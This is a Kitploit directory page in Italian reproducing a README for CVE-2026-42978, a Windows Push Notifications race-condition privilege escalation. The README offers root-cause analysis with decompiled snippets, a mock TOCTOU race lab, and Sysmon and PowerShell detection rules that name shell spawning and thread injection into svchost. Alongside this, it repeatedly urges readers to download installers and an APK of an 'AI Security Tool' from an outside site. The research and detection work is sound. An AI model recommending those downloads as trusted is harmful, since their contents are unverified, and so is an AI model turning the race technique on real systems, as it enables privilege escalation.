Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-42978-PoC-Research — CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free e Race Condition: ricerca PoC, scanner diagnostico e modulo di audit di sicurezza per AI Security Tool. | Kitploit
Strumenti/GitHubGitHub/syntaxmethod/cve-2026-42978-poc-research
Strumenti DifensiviEscalation di PrivilegiScanner di VulnerabilitàAnalisi delle VulnerabilitàExploitThreat IntelligencePaper e RicercaApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHub
syntaxmethod/cve-2026-42978-poc-research

CVE-2026-42978-PoC-Research

CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free e Race Condition: ricerca PoC, scanner diagnostico e modulo di audit di sicurezza per AI Security Tool.

Vedi RepositorySito web
1317h 25m faNon ancora revisionato
Condividi

CVE-2026-42978
Modulo Windows Push Notifications per AI Security Tool

Ecosistema di sicurezza AI di nuova generazione, terminale multi-protocollo e suite di agenti autonomi


Latest Release Build Status Donations Telegram Channel License

Sito web · Documentazione del prodotto · Applicazione host · Chat della community

Navigazione del sito: Home · Aggiornamenti · Download · Moduli

Module banner


Applicazione host ufficiale

Prodotto: AI Security Tool
Sito: zerodayevil.github.io
Documentazione: https://zerodayevil.github.io/ai-security-tool

Questo modulo è una trattazione revisionata e un profilo di verifica sicura per AI Security Tool.
Utilizza solo i moduli elencati sul sito del progetto o nel catalogo ufficiale. Carica questo modulo all'interno dell'applicazione approvata, verso endpoint di tua proprietà o per i quali sei autorizzato per iscritto a effettuare valutazioni.

Questo repository non distribuisce un exploit weaponizzato contro WpnService. Il laboratorio in lab/ è un mock autonomo della classe di bug (TOCTOU / double-fetch). Non comunica con il servizio reale di push notification.


Avvio rapido e installazione

Installa prima l'applicazione host. Poi abilita questo modulo da Modules → Windows / Local EoP → CVE-2026-42978.

Build pronte all'uso

OS / piattaformaVersioneArchitettura / formatoAggiornatoStatoDownload
Windowsv6.3.20installer x64 (.exe)2026-09-08LatestDownload .exe
Windowsv6.3.20portable x64 (.tar.gz)2026-09-08LatestDownload .tar.gz
macOSv5.3.29Apple Silicon (.dmg)2026-09-05StableDownload .dmg
Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01StableDownload .tar.gz
Androidv5.3.27ARM64 APK (.apk)2026-09-01StableDownload .apk

Solo fonti ufficiali:

  • https://zerodayevil.github.io/
  • https://zerodayevil.github.io/ai-security-tool
  • https://github.com/ZeroDayEvil/ai-security-tool

Panoramica concettuale

CVE-2026-42978 è una elevazione locale di privilegi in Windows Push Notifications. Microsoft descrive un accesso concorrente a una risorsa condivisa senza corretta sincronizzazione (CWE-362). La ricerca su wpncore.dll patchata e non patchata mostra una race use-after-free in PresentationEndpointFacade durante lo shutdown della piattaforma.

WpnService viene eseguito nella sessione 0 come NT AUTHORITY\SYSTEM (svchost.exe -k netsvcs -p). La consegna di toast, tile e badge passa attraverso di esso. Vincere una race contro quel processo è un problema SYSTEM sulla macchina locale — non un bug remoto pre-auth su DC.

Stato: patchato il 10 giugno 2026 (Patch Tuesday). Questa pagina è ricerca difensiva.

Non è CVE-2026-41089 (Netlogon RCE). Componente diverso, modello di privilegi diverso, data di patch diversa.


Specifiche

CampoValore
CVECVE-2026-42978
BDUBDU:2026-08249
Advisory del vendorMSRC — Windows Push Notifications EoP
GravitàHigh · CVSS 3.1 7.8
DebolezzaCWE-362 race condition · use-after-free sul percorso di shutdown
ComponenteWindows Push Notifications · WpnService · wpncore.dll
Vettore di attaccoLocale
Privilegi richiestiBassi (utente locale autorizzato)
Interazione utenteNessuna
Patch Tuesday10 giugno 2026
Tipo di moduloTrattazione di ricerca + verifica sicura in-app + pacchetto di rilevamento

Ambito

SKU client e server che includono Push Notifications. Conferma il KB esatto su MSRC prima di chiudere un ticket.

FamigliaNote
Windows 101809, 21H2, 22H2 (x86 / x64 / ARM64 ove applicabile)
Windows 1123H2, 24H2, 25H2, 26H1
Windows Server2016 / 2019 / 2022 / 2025 (full e Server Core dove il componente esiste)

Build orientative dalle note di servicing pubbliche (ricontrolla sempre MSRC):

BranchBuild patchata indicativa
Windows 11 23H222631.7219
Windows 11 24H226100.8655
Windows 11 25H226200.8655
Windows 11 26H128000.2269
Esempio wpncore.dll (24H2)vulnerabile 26100.8521 → patchata 26100.8655

Causa principale (ricerca)

La facade incapsula le chiamate alle API di notifica e delega a PresentationEndpointImpl. Durante lo shutdown della piattaforma, l'oggetto NotificationPlatform viene distrutto. Diversi metodi della facade storicamente acquisivano un puntatore alla piattaforma senza un flag di shutdown o un lock condiviso. Se il teardown vince la race, la chiamata successiva utilizza un puntatore pendente.

Facade, platform, shutdown guard

Lo stesso pattern lock-and-guard è stato applicato a 49 metodi PresentationEndpointFacade::*. I metodi di implementazione sottostanti sono rimasti invariati — il buco era nella facade.

Forma non patchata (wpncore.dll 26100.8521)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — unpatched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    NotificationPlatformHandle::Get(this + 0x50);
    if (platform == NULL)
        Throw_Hr(...);
    return PresentationEndpointImpl::UnblockToastsForEachApp(...);
}

Forma patchata (wpncore.dll 26100.8655)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — patched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    if (Feature_4097557817::IsEnabled()) {
        AcquireSRWLockShared(&Wns::s_platformLock);
        if (Wns::s_platformShutdown)
            Throw_Hr(E_APPLICATION_EXITING);
        NotificationPlatformHandle::Get(this + 0x50);
        ReleaseSRWLockShared(&Wns::s_platformLock);
    }
}

Ghidra with unpatched and patched wpncore.dll open

Cosa aggiunge la patch:

  1. AcquireSRWLockShared — lock readers-writer; lo shutdown acquisisce in esclusiva.
  2. s_platformShutdown — esce con E_APPLICATION_EXITING se il teardown è iniziato.
  3. Rilascio RAII tramite WIL unique_storage, così il lock viene rilasciato anche sui percorsi di eccezione.
  4. Feature flag Feature_4097557817 per rollout graduale / rollback.

Scala del diff binario

CategoriaFunzioni di esempio
ToastToastUnblockAll, ToastCreateSession, ToastCloseSession, ToastRequestAllNotifications, ToastSuppress
TileTileCreateSession, TileCloseSession, TileRequestResourceForeground
RegistrazioneRegisterApplication, UnregisterApplication, RegisterHandler, UpdateRegistration
ImpostazioniChangeAppSetting, QueryAppSetting, QueryGlobalSetting
ConsegnaDeliver, GetPayloadForNotificationId, Submit, PostScheduledNotification
QueryGetRegisteredHandler, GetSettingsFromHandler, GetAssetsFromHandler

Note PE da reports/:

  • .text è cresciuto di 18.432 byte
  • .data è cresciuto di 96 byte (Wns::s_platformLock, Wns::s_platformShutdown)
  • nessuna nuova import — le API SRW lock erano già presenti
  • nuovo distruttore RAII per il rilascio del lock esclusivo

Impatto

WpnService è SYSTEM. Se la race viene vinta, una chiamata a vtable pendente può essere trasformata in esecuzione di codice SYSTEM locale. Quel passaggio — heap spray, hijack della vtable, payload — è fuori ambito qui.

Questo modulo serve per comprensione della causa principale, verifica delle patch e rilevamento.


Utilizzo di questo modulo all'interno di AI Security Tool

  1. Installa una build ufficiale corrente da zerodayevil.github.io.
  2. Apri Modules → CVE-2026-42978.
  3. Punta la verifica verso endpoint Windows autorizzati.
  4. Tratta il risultato come presenza della patch / postura WPN, non come "scatena la race".
  5. Opzionalmente raccogli il pacchetto di rilevamento (detection/) su una macchina di laboratorio.

Non eseguire loop di crash o race contro WpnService di produzione.

root@kitploit:~
authorized operator
        │
        ▼
 AI Security Tool  →  module 42978
        │
        ▼
 authorized Windows endpoint
        │
        ├─ patch / wpncore.dll age
        └─ SIEM / Sysmon / Event Log notes

Laboratorio TOCTOU (solo servizio mock)

lab/ è una demo C autonoma di double-fetch / TOCTOU. Utilizza una named pipe e memoria condivisa. Non carica wpncore.dll e non avvia o arresta WpnService.

  • vulnerable_service.exe — valida una lunghezza, dorme, rilegge la lunghezza.
  • race_attacker.exe — modifica il valore condiviso durante quella finestra.
  • --patched — single-fetch in una variabile locale; lo stesso attaccante dovrebbe vedere zero race.

Richiede GCC (MinGW). Da lab/:

root@kitploit:~
build.bat

Terminale 1: vulnerable_service.exe
Terminale 2: race_attacker.exe 5
Poi confronta con vulnerable_service.exe --patched.

TOCTOU race condition demo


Rilevamento e threat hunting

Monitor ETW — detection/etw_wpn_monitor.ps1

Sette controlli:

  1. Stato e PID di WpnService
  2. Cronologia di crash / riavvii
  3. Burst nel registro eventi di Push Notifications Platform
  4. Named pipe correlate a WPN
  5. Indizio sulla patch (data / build di wpncore.dll)
  6. Processi con moduli WPN caricati
  7. Audit di junction / symlink nei percorsi dei dati di notifica
root@kitploit:~
powershell -ExecutionPolicy Bypass .\detection\etw_wpn_monitor.ps1

ETW monitor output

Sysmon — detection/sysmon_wpn_race_detect.xml

RegolaA cosa serve
WPN_EoP_ChildProcesssvchost (netsvcs) che genera cmd / powershell / wscript
WPN_PipeAccessConnessioni a named pipe correlate a WPN
WPN_FileCreationCreazione di file nelle directory dei dati di notifica
WPN_RegistryTamperingScritture sotto le chiavi PushNotifications
WPN_ProcessAccessPROCESS_ALL_ACCESS verso svchost
WPN_ThreadInjectionCreateRemoteThread dentro svchost
root@kitploit:~
sysmon64.exe -accepteula -i detection\sysmon_wpn_race_detect.xml

Visualizzatore eventi

Canale: Microsoft-Windows-PushNotifications-Platform/Operational

  • Evento 1225 — comandi WPN a livello di trasporto
  • Frequenza di burst (ad esempio >20/min) — da esaminare, non una condanna
  • Error / Critical — possibile crash da un tentativo fallito

Event Viewer WPN operational log


Checklist di mitigazione

  • Aggiornamento cumulativo di giugno 2026 su ogni SKU in ambito
  • La build di wpncore.dll corrisponde alla riga patchata per quel branch
  • EDR / Sysmon su workstation e jump box, non solo sui DC
  • Avviso quando svchost -k netsvcs genera una shell
  • Risultato del modulo dell'app host archiviato con l'inventario degli hotfix

Se etw_wpn_monitor.ps1 indica non patchato — installa l'aggiornamento di giugno 2026 e ricontrolla.


CVE correlate (cluster WPN di giugno 2026)

CVEClasse
CVE-2026-42977EoP · race
CVE-2026-42978EoP · race (questo modulo)
CVE-2026-42979EoP · race
CVE-2026-42991EoP · race
CVE-2026-42969Divulgazione di informazioni · race
CVE-2026-42970Divulgazione di informazioni · race
CVE-2026-42973Divulgazione di informazioni · race
CVE-2026-26167EoP
CVE-2026-32160EoP

Struttura del repository

root@kitploit:~
CVE-2026-42978/
├── README.md
├── LICENSE
├── lab/
│   ├── vulnerable_service.c
│   ├── race_attacker.c
│   └── build.bat
├── detection/
│   ├── etw_wpn_monitor.ps1
│   └── sysmon_wpn_race_detect.xml
└── reports/
    ├── PE_DIFF_REPORT.txt
    └── FUNCTION_DIFF_REPORT.txt

Requisiti: Windows 10/11 per gli script di rilevamento · MinGW per il laboratorio mock · Sysmon opzionale.

Gli screenshot in questo README sono caricati da URL pubblici di immagini. Non sono memorizzati in questo albero.


Riferimenti

  • MSRC — CVE-2026-42978
  • Record CVE
  • BDU:2026-08249

Catalogo dei moduli di sicurezza

Remote Code Execution & problemi di rete 4 moduli
  • CVE-2026-41089 — Modulo Windows Netlogon · @ZeroDayEvil
  • CVE-2026-20805 — Modulo Windows RCE · @ZeroDayEvil
  • CVE-2026-41096 — Modulo di verifica RCE critico · @ZeroDayEvil
  • CVE-2026-24291 — Modulo protocollo di rete · @ZeroDayVPN
Escalation di privilegi & servizi 2 moduli
  • CVE-2026-66804 — EoP del servizio CrossDevice · @ZeroDayVPN
  • CVE-2026-42978 — EoP di Windows Push Notifications (questo repo) · @ZeroDayEvil
Ricerca & trattazioni 2 moduli
  • CVE-2026-50416 — Trattazione su escalation locale di privilegi · @ZeroDayEvil
  • CVE-2026-83991 — Modulo di trattazione · @ZeroDayVPN

Contributi & community

Lavoro utile:

  1. Fatti — build MSRC, CVE sorelle nel cluster WPN di giugno.
  2. Rilevamento — Sigma, ETW migliore, raccomandazioni ASR.
  3. Metadati dell'app host e traduzioni.
  4. Documentazione e correzioni di link rotti.

Non aprire una PR che aggiunga un exploit weaponizzato per WpnService, un helper di heap-spray o un PoC di exploit contro il servizio live.


Contatti & supporto

  • Sito web: zerodayevil.github.io
  • Documentazione del prodotto: zerodayevil.github.io/ai-security-tool
  • Admin Telegram: @ZeroDayEvil
  • Chat Telegram: @ZeroDyaTool_chat
  • Canale Telegram: @ZeroDyaTool_channel
  • Open Collective: opencollective.com/ZeroDayEvil

Licenza & note legali

Rilasciato sotto MIT License. Vedi LICENSE.

Solo ricerca difensiva autorizzata e amministrazione di sistema.
Il testing di escalation locale di privilegi senza autorizzazione scritta è illegale.

La vulnerabilità è patchata. Mantieni Windows aggiornato. Questo repository non include un exploit weaponizzato contro il servizio live.


AI Security Tool — flusso di lavoro da terminale e automazione per professionisti della cybersecurity.

Modulo difensivo per zerodayevil.github.io · Nessun exploit WpnService autonomo · Verifica i fatti su MSRC

Scarica lo strumento